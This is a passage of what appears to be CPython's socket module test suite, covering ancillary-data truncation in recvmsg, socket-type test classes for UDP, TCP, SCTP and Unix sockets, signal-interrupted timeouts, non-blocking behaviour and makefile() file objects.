# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
